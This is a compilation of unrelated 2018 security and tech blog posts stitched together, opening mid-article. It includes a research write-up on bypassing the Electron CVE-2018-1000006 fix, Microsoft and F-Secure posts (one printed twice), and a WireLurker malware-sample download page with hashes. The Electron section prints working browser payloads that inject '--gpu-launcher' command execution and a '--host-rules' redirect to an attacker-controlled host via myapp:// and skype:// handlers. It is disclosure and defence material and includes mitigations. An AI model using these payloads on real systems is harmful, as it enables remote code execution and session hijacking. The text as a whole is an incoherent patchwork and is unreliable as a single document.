Usually this should remove the virus. However, in some cases you might find that the Uninstall button is greyed out and inaccessible. This is because the virus has given itself Device Administrator access. You’ll need to exit the Apps menu and tap on Settings>Security>Device Administrators. This is where you’ll find a list of apps on your device with administrator status. Untick the box for the app you’d like to remove and then tap Deactivate.

You should now be able to return to the original apps menu and remove that app. Now that the virus is removed, restart your device and turn off Safe mode. Once your virus is removed be sure to back up any important information you have on your device, and install an Android antivirus to avoid future breaches.

The post How to Get Rid of a Virus appeared first on Panda Security Mediacenter.

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances, this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via security@electronjs.org) on May 14, 2018, and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006

On January 22, 2018, Electron released a patch for v1.7.11v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>

Interestingly, on January 31, 2018, Electron v1.7.12v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script> 

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after an url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}

As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments such as Electron:

  • The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
  • The blacklist is implemented using a binary search. Valid flags could be missed by the check if the list is not properly sorted

Bypass and security implications

We started looking for missed flags and noticed that host-rules were absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately sticks out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
<script>
 window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

https://blog.doyensec.com/public/images/skypeelectronbugpoc.mp4

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oOAuthtokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason, Electron’s update feature, along with other critical functions, are not affected by this vulnerability.

Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

About the author: Luca Carettoni(@lucacarettoni) and John Villamil (@day6reak)

Original post availale here

Pierluigi Paganini

(Security Affairs – Electron apps, hakcing)

The post Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix) appeared first on Security Affairs.

Microsoft Secure: Adding transparency and context into industry AV test results

 

Corporate Vice President Brad Anderson recently shared his insights on how Windows Defender Advanced Threat Protection (Windows Defender ATP) evolved to achieve important quality milestones. Our Windows Defender ATP team is committed to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions. In the continued spirit of these principles, we want to share the results of the January-February 2018 test conducted by independent antivirus tester AV-TEST and provide a transparency report that augments the test findings with contextual information to help our customers make informed decisions about Windows Defender ATP adoption.

Download the complete transparency report on January-February 2018 test results

 

At a high-level, the transparency report shows:

Protection: Windows Defender Antivirus (Windows Defender AV) achieved a perfect score in Protection, maintaining consistently high scores in this category.
Usability (false positives): Windows Defender AV achieved an improved Usability score of 5.5/6.0. Per our telemetry, samples that Windows Defender AV incorrectly classified (false positive) had very low prevalence and are not commonly used in business context.
Performance: Windows Defender AV improved this cycle, achieving a 5.5/6.0 Performance score and outperforming the industry in almost all areas. These results reflect the investments we put in optimizing Windows Defender AV performance for high-frequency actions (e.g., application run).

 

While independent tests can help assess a security solutions capabilities and protections, it is important to understand that antivirus tests are only one part of a complete quality assessment. To truly understand the protection quality of an endpoint protection platform (EPP) and endpoint detection and response (EDR) solution like Windows Defender ATP, its entire set of capabilities must be evaluated.

For instance, while Windows Defender ATPs antivirus capability achieved a perfect overall Protection score in the January-February 2018 tests and only missed two out of thousands of samples tested, it performed even better than the results suggest. The Windows Defender Security Intelligence team tested the two missed samples against the entire Windows Defender ATP stack to assess these samples ability to infect machines in real-world enterprise environments. The team was able to confirm that the two missed samples were detected and mitigated by other components of the Windows Defender ATP stack.

 

As threats become more sophisticated, Microsoft and other security platform vendors continue evolving their product capabilities to detect threats across different attack stages. We hope to see independent testers evolve their methodologies as well. Our customers need greater transparency and optics into what an end-to-end solution can accomplish in terms of total preventive protection, including the quality of individual components like antivirus. Microsoft is highly engaged in working with several independent testers to evolve security testing to focus on end-to-end security stack testing.

Meanwhile, we continue to focus on improving our next-generation antivirus solution while at the same time delivering new innovative capabilities like attack surface reduction and hardware-based isolation, just to name a few. In the Windows 10 April 2018 Update, you can experience these new and improved capabilities in Windows Defender ATP, which provides a complete endpoint protection platform (EPP) and endpoint detection and response (EDR) solution. To see these capabilities for yourself sign up for a 90-day trial of Windows Defender ATP today, or enable Preview features on existing tenants.

 

 

Zaid Arafeh

Senior Program Manager, Windows Defender Research team

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.



Microsoft Secure

Adding transparency and context into industry AV test results

 

Corporate Vice President Brad Anderson recently shared his insights on how Windows Defender Advanced Threat Protection (Windows Defender ATP) evolved to achieve important quality milestones. Our Windows Defender ATP team is committed to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions. In the continued spirit of these principles, we want to share the results of the January-February 2018 test conducted by independent antivirus tester AV-TEST and provide a transparency report that augments the test findings with contextual information to help our customers make informed decisions about Windows Defender ATP adoption.

Download the complete transparency report on January-February 2018 test results

 

At a high-level, the transparency report shows:

Protection: Windows Defender Antivirus (Windows Defender AV) achieved a perfect score in Protection, maintaining consistently high scores in this category.
Usability (false positives): Windows Defender AV achieved an improved Usability score of 5.5/6.0. Per our telemetry, samples that Windows Defender AV incorrectly classified (false positive) had very low prevalence and are not commonly used in business context.
Performance: Windows Defender AV improved this cycle, achieving a 5.5/6.0 Performance score and outperforming the industry in almost all areas. These results reflect the investments we put in optimizing Windows Defender AV performance for high-frequency actions (e.g., application run).

 

While independent tests can help assess a security solutions capabilities and protections, it is important to understand that antivirus tests are only one part of a complete quality assessment. To truly understand the protection quality of an endpoint protection platform (EPP) and endpoint detection and response (EDR) solution like Windows Defender ATP, its entire set of capabilities must be evaluated.

For instance, while Windows Defender ATPs antivirus capability achieved a perfect overall Protection score in the January-February 2018 tests and only missed two out of thousands of samples tested, it performed even better than the results suggest. The Windows Defender Security Intelligence team tested the two missed samples against the entire Windows Defender ATP stack to assess these samples ability to infect machines in real-world enterprise environments. The team was able to confirm that the two missed samples were detected and mitigated by other components of the Windows Defender ATP stack.

 

As threats become more sophisticated, Microsoft and other security platform vendors continue evolving their product capabilities to detect threats across different attack stages. We hope to see independent testers evolve their methodologies as well. Our customers need greater transparency and optics into what an end-to-end solution can accomplish in terms of total preventive protection, including the quality of individual components like antivirus. Microsoft is highly engaged in working with several independent testers to evolve security testing to focus on end-to-end security stack testing.

Meanwhile, we continue to focus on improving our next-generation antivirus solution while at the same time delivering new innovative capabilities like attack surface reduction and hardware-based isolation, just to name a few. In the Windows 10 April 2018 Update, you can experience these new and improved capabilities in Windows Defender ATP, which provides a complete endpoint protection platform (EPP) and endpoint detection and response (EDR) solution. To see these capabilities for yourself sign up for a 90-day trial of Windows Defender ATP today, or enable Preview features on existing tenants.

 

 

Zaid Arafeh

Senior Program Manager, Windows Defender Research team

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Rollout of Windows 10 April Update Halted For Devices With Intel and Toshiba SSDs

Catalin Cimpanu, writing for BleepingComputer: Microsoft has halted the deployment of the Windows 10 April 2018 Update for computers using certain types of Intel and Toshiba solid state drives (SSDs). The Redmond-based OS maker took this decision following multiple user reports about the Windows 10 April 2018 Update not working properly on devices using: Intel SSD 600p Series, Intel SSD Pro 6000p Series, Toshiba XG4 Series, Toshiba XG5 Series, and Toshiba BG3 Series. The Intel and Toshiba issues appear to be different. More specifically, Windows PCs using Intel SSDs would often crash and enter a UEFI screen after reboot, while users of Toshiba SSDs reported lower battery life and SSD drives becoming very hot.

Read more of this story at Slashdot.

Windows 10 build 17666 introduces Dark mode, Cloud Clipboard, Updated Notepad

Here’s what’s new in Windows 10 build 17666

Recently, Microsoft in its newest test build release of the Windows 10 showcased the new improvements to be officially released in the current year. Amongst various other additions, Microsoft also showcased a dark theme for their file explorer. The company doesn’t have a full version of the dark theme at the current point of time but it teased how the file explorer would look if the ‘dark mode’ was implemented.

For many people for whom, the new ‘dark mode’ feature is a boon. This is because it gives them ease while working in the dark by reducing the strain on their eyes. Additionally, it can also be combined with the Windows 10 pre-loaded night-light option which is greatly helpful for users working in the dark.

Apart from the dark mode, there are various other features which Microsoft released in their newest update in the build, namely:

  1. Cloud Clipboard
  2. Fluent Design
  3. Notepad

Cloud Clipboard

There are users who often need to switch between their hand-held devices and their computer or laptop. While doing so, they often need to copy and paste data from one device to the other. This often becomes hectic, as they need to plug their devices into the computer.

To eliminate this hassle, Microsoft in its new update introduced the Cloud Clipboard. The Cloud Clipboard lets users access their copied clipboard content across multiple devices. The clipboard in its newest update contains a history that keeps a track of all that has been copied. The clipboard then synchronizes the copied content in a similar way like the Sets and Timeline sync. This helps the users to get the copied content on other devices.

Fluent Design

The released build also showcased a few subtle changes in the design. The operating system in its newest release contains an acrylic title bar. While multitasking, the Alt-Tab switcher keys also include recent Microsoft Edge tabs. However, if people find this feature exasperating, they can choose to disable it under the Settings menu.

Apart from this, Windows 10 also allows the users to greater flexibility while opening applications or websites. If needed, users can adjust their Sets preference to “Window”. This prevents any further windows from being opened into a new tab unless users explicitly click the + or use the “Tab” button.

Notepad

The final major update brought by Microsoft was the Notepad. The company integrated the Bing search with the Notepad, which helps users to highlight words and search them right-away from the Notepad. Apart from this, users can also have results opened on a new page instead of a separate window by enabling the Sets.

The newest build version promises various features which are advantageous to multiple users. The Cloud Clipboard and the upgrades in Notepad are certain features which will make many users upgrade their operating system. In case, users feel like making use of these features, they can sign up to the Insiders program of Microsoft and request for their copy of the Windows 10 build 17666. For other Windows users, the update will start rolling out later in the year.

The post Windows 10 build 17666 introduces Dark mode, Cloud Clipboard, Updated Notepad appeared first on TechWorm.

Windows XP 2018 Edition: This Concept Will Make You Fall In Love With It

Windows XP 2018 Edition: A Commendable Imaginary Approach

Microsoft, the global leader of software technology has come so far in context with developments. From Windows XP to Windows 10, the company has facilitated the introduction of many fascinating features that have changed the technological market in many ways. Though, it’s been 17 years since the operating system, Windows XP was launched, it still holds immense importance. The company ceased the support system towards XP back in 2014; the operating software is in use by thousands of operators or users even now. As per the latest NEWMARKETSHARE reports, Windows XP holds a significant share of 6.13 percent that signifies it is being used in many businesses and industries till now. Though the outdated aspects of Windows XP don’t match up with the versatile features of that of windows 10, but what if Windows XP is revived?

What brings Windows XP in highlights is an imagination. How would Windows XP look if it is redesigned as per the standards and expectations for 2018? Well, one such imagination of tech youtuber, Kamer Kaan Avdan, has lightened up the glimpse in our eyes, of how Windows XP should look in 2018.

Kamer Kaan Avdan, a tech youtuber, who has previously introduced the concept of Android 9.0, Windows 11 and iOS 12, rejuvenated and presented the concept of Windows XP with modifications and advancements that leave the spectators surprisingly dumbstruck.

The concept of the 2018 version of Windows XP lays down many alternations, making way for betterments, at the same time, maintaining the essence and originality of the original Windows XP version of Microsoft. Though, the refined version maintains its original color, but many alternations driving in, have eliminated monotonous and outdated features. The rectangular corners have been replaced by fine curve-shaped corners. Windows 10, being the most recently launched version of the operating software, has influenced the redrafted version to a great extent. The login screen, the power menu and the task bar have been refurnished and inspired from the features of Windows 10. The most attractive element of the proposed version proves out to the start menu which has the touch of the original version combined with additional yet modern tiles. The timeline also seems to be influenced by the features of the original version yet modified. In addition, with these significant changes, some appreciable alterations have also been observed in the redesigned mail app, the file explorer and many other minor yet commendable changes.

The science and tech youtuber presented the video as a comparison between the original version and the redrafted version. The video has been created in a very sophisticated manner that is being appreciated by both the critics and spectators. There was one cartoon assistant also, who originally debuted in the Microsoft Bob. Apart from the technical modifications, the background music, the editing and the simultaneous comparisons, altogether add up to the perfection of the imagined version of this operating system.

However, the video has gathered enough popularity but the fact is it’s just an imagined version by an individual. No matter how perfectly it has been drafted, it’s just an idea and not an execution. Let’s see whether this amazing approach could transform into a commendable version of Windows.

The post Windows XP 2018 Edition: This Concept Will Make You Fall In Love With It appeared first on TechWorm.

Advancing the future of society with AI and the intelligent edge

The world is a computer, filled with an incredible amount of data. By 2020, the average person will generate 1.5GB of data a day, a smart home 50GB and a smart city, a whopping 250 petabytes of data per day. This data presents an enormous opportunity for developers — giving them a seat of power, while also giving them tremendous responsibility. That’s why this morning at Build, we don’t take our jobs lightly in helping to equip these developers with the tools and guidance to change the world. On stage in Seattle, Microsoft CEO Satya Nadella is describing this new world view, fueled by AI that can power better health care, relieve challenges around basic human needs and create a society that’s more inclusive and accessible.

Helping create a better, safer, more just world is a responsibility we take seriously at Microsoft. We’ve always been committed to the ethical creation and use of technology. As AI increasingly becomes part of our lives, Microsoft’s commitment to advancing human good has never been stronger. Today, we’re announcing AI for Accessibility, a new $25 million, five-year program aimed at harnessing the power of AI to amplify human capability for the more than one billion people around the world with disabilities. AI for Accessibility is a call to action for developers, NGOs, academics, researchers and inventors to accelerate their work for people with disabilities, focusing on three areas: employment, human connection and modern life. It includes grants, technology and AI expertise to accelerate the development of accessible and intelligent AI solutions and builds on recent advancements in Azure Cognitive Services to help developers create intelligent apps that can empower people with hearing, vision and other disabilities. Real-time speech-to-text transcription, visual recognition services and predictive text functionality that suggests words as people type are just a few examples. We’ve seen this impact through the launch of Seeing AI and alt-text which empowers people who are blind or low vision; as well as Helpicto, which helps people with autism.

If AI is the heart of how we can advance society, the intelligent cloud and the intelligent edge are the backbone. In the next 10 years, billions of everyday devices will be connected — smart devices that can see, listen, reason, predict and more, without a 24/7 dependence on the cloud. This is the intelligent edge, and it is the interface between the computer and the real world. The edge takes AI and cloud together to collect and make sense of new information, especially in scenarios that are too dangerous for humans or require new approaches to solve, whether they be on the factory floor or in the operating room.

Today we’re giving developers the tools and guidance to build these possibilities. For example, we’re making it easier to build apps at the edge by open sourcing the Azure IoT Edge Runtime, allowing customers to modify the runtime and customize applications at the edge. We’re giving developers Custom Vision — the first Azure Cognitive Service available for the edge — to build applications that use powerful AI algorithms that interpret, listen, speak and see for edge devices. And we are partnering across both DJI and Qualcomm. Microsoft and DJI, the world’s largest drone company, will collaborate to develop commercial drone solutions so that developers in key vertical segments such as agriculture, construction and public safety can build life-changing solutions, like applications that can help farmers produce more crops. With Qualcomm Technologies Inc., we announced a joint effort to create a vision AI dev kit running Azure IoT Edge, for camera-based IoT solutions. The camera can power advanced Azure services like machine learning and cognitive services that can be downloaded from Azure and run locally on the edge. Other advancements include a preview of Project Brainwave, an architecture for deep neural net processing, that is now available on Azure and on the edge. Project Brainwave makes Azure the fastest cloud to run real-time AI today.

We are also releasing new Azure Cognitive Services updates such as a unified Speech service that makes it easier for developers to add speech recognition, text-to-speech, customized voice models and translation to their applications. In addition, we’re making Azure the best place to develop conversational AI experiences integrated with any agent. New updates to Bot Framework, combined with our new Cognitive Services updates, will power the next generation of conversational bots, enabling richer dialogs and full personality and voice customization to match a company’s brand identity.

It was eight years ago when we shipped Kinect, which was the first AI device with speech, gaze and vision. We then took that technology forward with Microsoft HoloLens. We’ve seen developers build transformative solutions across a multitude of industries, from security to manufacturing to health care and more. As sensor technology has evolved, we see incredible possibilities for combining these sensors with the power of Azure AI services such as machine learning, Cognitive Services and IoT Edge.

Today we are excited to announce a new initiative, Project Kinect for Azure — a package of sensors from Microsoft that contains our unmatched time-of-flight depth camera, with onboard compute, in a small, power-efficient form factor — designed for AI on the edge. Project Kinect for Azure brings together this leading hardware technology with Azure AI to empower developers with new scenarios for working with ambient intelligence.

Similarly, our Speech Devices software development kit announced today delivers superior audio processing from multi-channel sources for more accurate speech recognition, including noise cancellation, far-field voice and more. With this SDK, developers can build for a variety of voice-enabled scenarios like drive-thru ordering systems, in-car or in-home assistants, smart speakers and other digital assistants.

This new age of technology is also fueled by mixed reality, which is opening up new possibilities in the workplace. Today we announced two new apps that will help empower firstline workers, the first workers to interface with customers and triage problems: Microsoft Remote Assist and Microsoft Layout. Microsoft Remote Assist enables remote collaboration via hands-free video calling, letting firstline workers share what they see with any expert on Microsoft Teams, while staying hands on to solve problems and complete tasks together. In a similar vein, Microsoft Layout lets workers design spaces in context with mixed reality, using 3D models for creating room layouts with holograms.

Whether creating a more inclusive and accessible world, solving problems that plague humanity or helping improve the way we work and live, developers are playing a leading role. As new ideas and solutions with AI and intelligent edge emerge, Microsoft will continue to advocate for developers and give them the tools and cloud services that make it possible to build these new solutions to solve real problems. From the top down, we are a developer-led company that continues to invest in coders and give them free rein to solve problems.

Learn more about how we’re empowering developers to build for this future today using Azure and M365, via blog posts from Executive Vice President of Cloud + AI Scott Guthrie and Corporate Vice President of Windows Joe Belfiore.

 

The post Advancing the future of society with AI and the intelligent edge appeared first on The Official Microsoft Blog.

Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers

Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers. Windows Host Compute Service Shim (hcsshim) is an open source library that helps "Docker for Windows" execute Windows Server containers

Yes, your PC is getting slower. But why?

I’m sure you know the feeling. You used to have a nice brand-new computer and everything loaded so quickly. It was a pleasure to use it. But now it is slowing down and you see more and more of the dreaded spinning hourglass, or some other animated mouse pointer. Yes, a computer is really like a marriage. Everything is so nice in the beginning, but friction is often building up over time. Both need some maintenance to avoid problems. 😉

You have to fix your marriage yourself, I’m not an expert in that field. But let’s take a closer look at the computer because it’s a lot easier to understand. First the three most common reasons for slowness.

  1. Your system is getting clogged up by junk. You have unnecessary programs installed and there is virtual garbage everywhere.
  2. Your system is just getting too old. You are running out of hardware capacity as you want to do more with the latest program versions.
  3. You are infected. Malware on the system is stealing your capacity.

I will in this article focus on the first point as it is by far the most common reason. But first a couple of words about the other reasons. Number 2 is pretty obvious. If your system is too old then you need to get a new computer. My only advice here is to consider if you really need a traditional PC or if a tablet could do the work. The mobile devices have a much more modern architecture, which improves security. Number 3 is also quite straightforward. If you suspect this, you just need to check out F-Secure Internet Security  or SAFE.

Ok, but now to the real beef. Your problem is most likely an messy system, but what to do? This problem is technically complex and there is probably a large number of smaller factors that all contribute to a significant slowdown. Now you have two options, do it yourself or get a cleaning tool. A lot can actually be done manually. Just Google for “speed up PC”, or something similar, and you have tons of instructions of varying relevance, quality and level of technical competence. Works well for nerds, but many don’t want to go there.

That’s why we made F-Secure Booster. I have been running this tool for a while on my computer, and it’s really a convenient way to keep the system in shape. You can clean a lot automatically just by a clicking a button. But Booster also has a fairly comprehensive set of optimizations that you can review and select one by one. So it’s easy to use, but can also keep the more technically savvy users occupied for a while. Quite a nice combination in my opinion.

So why not give F-Secure Booster a try right away? It may push the end-of-life of your PC forward by several years. And makes sure you get less gray hair.

 

Safe surfing,
Micke

 

PS. I wish there was a simple tool for revitalizing marriages too. And I leave it to you to come up with funny analogies between marriages and the problems #2 and #3. 😉

 

Image by Kimchi.sg

Which operating system is the most secure? Four points to remember.

No, you are almost certainly wrong if you tried to guess. A recent study shows that products from Apple actually are at the top when counting vulnerabilities, and that means at the bottom security-wise. Just counting vulnerabilities is not a very scientific way to measure security, and there is a debate over how to interpret the figures. But this is anyway a welcome eye-opener that helps kill old myths.

Apple did for a long time stubbornly deny security problems and their marketing succeeded in building an image of security. Meanwhile Windows was the biggest and most malware-targeted system. Microsoft rolled up the sleeves and fought at the frontline against viruses and vulnerabilities. Their reputation suffered but Microsoft gradually improved in security and built an efficient process for patching security holes. Microsoft had what is most important in security, the right attitude. Apple didn’t and the recent vulnerability study shows the result.

Here’s four points for people who want to select a secure operating system.

  • Forget reputation when thinking security. Windows used to be bad and nobody really cared to attack Apple’s computers before they became popular. The old belief that Windows is unsafe and Apple is safe is just a myth nowadays.
  • There is malware on almost all commonly used platforms. Windows Phone is the only exception with practically zero risk. Windows and Android are the most common systems and malware authors are targeting them most. So the need for an anti-malware product is naturally bigger on these systems. But the so called antivirus products of today are actually broad security suites. They protect against spam and harmful web sites too, just to mention some examples. So changes are that you want a security product anyway even if your system isn’t one of the main malware targets.
  • So which system is most secure? It’s the one that is patched regularly. All the major systems, Windows, OS X and Linux have sufficient security for a normal private user. But they will also all become unsafe if the security updates are neglected. So security is not really a selection criteria for ordinary people.
  • Mobile devices, phones and tablets, generally have a more modern systems architecture and a safer software distribution process. Do you have to use a desktop or laptop, or can you switch to a tablet? Dumping the big old-school devices is a way to improve security. Could it work for you?

So all this really boils down to the fact that you can select any operating system you like and still be reasonable safe. There are some differences though, but it is more about old-school versus new-school devices. Not about Apple versus Microsoft versus Linux. Also remember that your own behavior affects security more than your choice of device, and that you never are 100% safe no matter what you do.

 

Safe surfing,
Micke

 

Added February 27th. Yes, this controversy study has indeed stirred a heated debate, which isn’t surprising at all. Here’s an article defending Apple. It has flaws and represent a very limited view on security, but one of its important points still stands. If someone still thinks Apple is immortal and invincible, it’s time to wake up. And naturally that this whole debate is totally meaningless for ordinary users. Just keep patching what you have and you will be fine. 🙂 Thanks to Jussi (and others) for feedback.

 

Wirelurker for OSX, iOS (Part I) and Windows (Part II) samples


PART II

Wirelurker for Windows (WinLurker)

Research: Palo Alto Claud Xiao: Wirelurker for Windows

Sample credit: Claud Xiao



PART I


Research: Palo Alto Claud Xiao WIRELURKER: A New Era in iOS and OS X Malware

Palo Alto |Claud Xiao - blog post Wirelurker

Wirelurker Detector https://github.com/PaloAltoNetworks-BD/WireLurkerDetector


Sample credit: Claud Xiao


Download

Download Part I
Download Part II

Email me if you need the password




List of files
List of hashes 

Part II

s+«sìÜ 3.4.1.dmg 925cc497f207ec4dbcf8198a1b785dbd
apps.ipa 54d27da968c05d463ad3168285ec6097
WhatsAppMessenger 2.11.7.exe eca91fa7e7350a4d2880d341866adf35
使用说明.txt 3506a0c0199ed747b699ade765c0d0f8
libxml2.dll c86bebc3d50d7964378c15b27b1c2caa
libiconv-2_.dll 9c8170dc4a33631881120a467dc3e8f7
msvcr100.dll bf38660a9125935658cfa3e53fdc7d65
libz_.dll bd3d1f0a3eff8c4dd1e993f57185be75
mfc100u.dll f841f32ad816dbf130f10d86fab99b1a

zlib1.dll c7d4d685a0af2a09cbc21cb474358595


│   apps.ipa
│   σ╛«σìÜ 3.4.1.dmg

└───WhatsAppMessenger 2.11.7
            libiconv-2_.dll
            libxml2.dll
            libz_.dll
            mfc100u.dll
            msvcr100.dll
            WhatsAppMessenger 2.11.7.exe
            zlib1.dll
            使用说明.txt


Part I

BikeBaron 15e8728b410bfffde8d54651a6efd162
CleanApp c9841e34da270d94b35ae3f724160d5e
com.apple.MailServiceAgentHelper dca13b4ff64bcd6876c13bbb4a22f450
com.apple.appstore.PluginHelper c4264b9607a68de8b9bbbe30436f5f28
com.apple.appstore.plughelper.plist 94a933c449948514a3ce634663f9ccf8
com.apple.globalupdate.plist f92640bed6078075b508c9ffaa7f0a78
com.apple.globalupdate.plist f92640bed6078075b508c9ffaa7f0a78
com.apple.itunesupdate.plist 83317c311caa225b17ac14d3d504387d
com.apple.machook_damon.plist 6507f0c41663f6d08f497ab41893d8d9
com.apple.machook_damon.plist 6507f0c41663f6d08f497ab41893d8d9
com.apple.MailServiceAgentHelper.plist e6e6a7845b4e00806da7d5e264eed72b
com.apple.periodic-dd-mm-yy.plist bda470f4568dae8cb12344a346a181d9
com.apple.systemkeychain-helper.plist fd7b1215f03ed1221065ee4508d41de3
com.apple.watchproc.plist af772d9cca45a13ca323f90e7d874c2c
FontMap1.cfg 204b4836a9944d0f19d6df8af3c009d5
foundation 0ff51cd5fe0f88f02213d6612b007a45
globalupdate 9037cf29ed485dae11e22955724a00e7
globalupdate 9037cf29ed485dae11e22955724a00e7
itunesupdate a8dfbd54da805d3c52afc521ab7b354b
libcrypto.1.0.0.dylib 4c5384d667215098badb4e850890127b
libcrypto.1.0.0.dylib 3b533eeb80ee14191893e9a73c017445
libiconv.2.dylib 94f9882f5db1883e7295b44c440eb44c
libiconv.2.dylib fac8ef9dabdb92806ea9b1fde43ad746
libimobiledevice.4.dylib c596adb32c143430240abbf5aff02bc0
libimobiledevice.4.dylib 5b0412e19ec0af5ce375b8ab5a0bc5db
libiodb.dylib bc3aa0142fb15ea65de7833d65a70e36
liblzma.5.dylib 5bdfd2a20123e0893ef59bd813b24105
liblzma.5.dylib 9ebf9c0d25e418c8d0bed2a335aac8bf
libplist.2.dylib 903cbde833c91b197283698b2400fc9b
libplist.2.dylib 109a09389abef9a9388de08f7021b4cf
libssl.1.0.0.dylib 49b937c9ff30a68a0f663828be7ea704
libssl.1.0.0.dylib ab09435c0358b102a5d08f34aae3c244
libusbmuxd.2.dylib e8e0663c7c9d843e0030b15e59eb6f52
libusbmuxd.2.dylib 9efb552097cf4a408ea3bab4aa2bc957
libxml2.2.dylib 34f14463f28d11bd0299f0d7a3985718
libxml2.2.dylib 95506f9240efb416443fcd6d82a024b9
libz.1.dylib 28ef588ba7919f751ae40719cf5cffc6
libz.1.dylib f2b19c7a58e303f0a159a44d08c6df63
libzip.2.dylib 2a42736c8eae3a4915bced2c6df50397
machook 5b43df4fac4cac52412126a6c604853c
machook ecb429951985837513fdf854e49d0682
periodicdate aa6fe189baa355a65e6aafac1e765f41
pphelper 2b79534f22a89f73d4bb45848659b59b
sfbase.dylib bc3aa0142fb15ea65de7833d65a70e36
sfbase.dylib bc3aa0142fb15ea65de7833d65a70e36
sfbase_v4000.dylib 582fcd682f0f520e95af1d0713639864
sfbase_v4001.dylib e40de392c613cd2f9e1e93c6ffd05246
start e3a61139735301b866d8d109d715f102
start e3a61139735301b866d8d109d715f102
start.sh 3fa4e5fec53dfc9fc88ced651aa858c6
stty5.11.pl dea26a823839b1b3a810d5e731d76aa2
stty5.11.pl dea26a823839b1b3a810d5e731d76aa2
systemkeychain-helper e03402006332a6e17c36e569178d2097
watch.sh 358c48414219fdbbbbcff90c97295dff
WatchProc a72fdbacfd5be14631437d0ab21ff960
7b9e685e89b8c7e11f554b05cdd6819a 7b9e685e89b8c7e11f554b05cdd6819a
update 93658b52b0f538c4f3e17fdf3860778c
start.sh 9adfd4344092826ca39bbc441a9eb96f

File listing

├───databases
│       foundation
├───dropped
│   ├───version_A
│   │   │   com.apple.globalupdate.plist
│   │   │   com.apple.machook_damon.plist
│   │   │   globalupdate
│   │   │   machook
│   │   │   sfbase.dylib
│   │   │   watch.sh
│   │   │
│   │   ├───dylib
│   │   │       libcrypto.1.0.0.dylib
│   │   │       libiconv.2.dylib
│   │   │       libimobiledevice.4.dylib
│   │   │       liblzma.5.dylib
